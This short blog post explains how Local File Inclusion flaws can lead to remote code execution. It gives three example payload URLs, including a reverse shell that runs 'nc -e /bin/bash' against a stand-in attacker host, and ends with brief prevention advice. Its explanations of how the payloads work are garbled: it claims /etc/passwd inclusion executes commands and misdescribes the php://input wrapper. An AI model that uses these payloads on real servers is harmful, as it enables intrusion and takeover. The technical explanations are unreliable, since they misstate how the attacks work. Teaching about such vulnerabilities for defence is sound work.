Local File Inclusion (LFI) to RCE

Aditya Chauhan
2 min readFeb 16, 2023

--

Local File Inclusion (LFI) is a type of web application vulnerability that allows an attacker to access and execute files on a web server. In an LFI attack, an attacker is able to manipulate a web application to include a local file, which can contain malicious code that is executed on the web server. This can lead to remote code execution (RCE), which is a serious security issue that can allow an attacker to take complete control of the web server.

The basic principle of an LFI attack is to trick a web application into loading a local file. Typically, this involves manipulating the web application's input parameters to include a file path that points to a file on the web server. When the application processes this input, it includes the contents of the local file in the application's output. If the file contains malicious code, this can lead to the execution of that code, including RCE payloads that give the attacker complete control over the server.

There are several ways to exploit an LFI vulnerability to achieve RCE. Some of the most common payloads used in LFI attacks include:

  1. Command Injection payloads: These payloads involve including a command that is executed on the web server. For example, an attacker could include a command to create a new user account on the server, which would give the attacker administrative access.
  2. Reverse Shell payloads: These payloads involve including a reverse shell script that connects back to the attacker's system. Once the shell is established, the attacker can execute commands on the server and take control of the system.
  3. PHP Wrappers payloads: These payloads involve using PHP wrappers to execute arbitrary code on the server. For example, an attacker could use the "php://input" wrapper to execute a PHP script sent as a request body.

Here are some specific examples of LFI payloads that can be used to achieve RCE:

  1. Command Injection payload:
http://example.com/index.php?page=/etc/passwd&cmd=id

This payload will execute the 'id' command on the server using the contents of the '/etc/passwd' file.

  1. Reverse Shell payload:
http://example.com/index.php?page=/var/log/apache/access.log&cmd=nc%20-e%20/bin/bash%20attacker.com%204444

This payload will execute a reverse shell command that connects back to the attacker's system. The attacker can then use the shell to execute commands on the server.

2.PHP Wrappers payload:

http://example.com/index.php?page=php://input&cmd=cat%20/etc/passwd

This payload will use the "php://input" wrapper to execute the 'cat /etc/passwd' command on the server.

In order to prevent LFI attacks that can lead to RCE, it is important for web application developers to implement proper input validation and sanitization. They should also use security frameworks and libraries that can help detect and prevent LFI attacks. Additionally, server administrators should limit access to the server's file system and use firewalls to block access to sensitive files.

In conclusion, LFI to RCE attacks are a serious security issue that can allow attackers to take complete control of a web server. Web application developers and server administrators should take steps to prevent these types of attacks by implementing proper security measures and best practices.

--

--

Aditya Chauhan

ISO 27001 LA | VAPT | Synack Red Teamer | HTB Dante | HTB RASTA | HTB Cybernetics | HTB Offshore | HTB APTLabs | Cyber Security Analyst | Security Researcher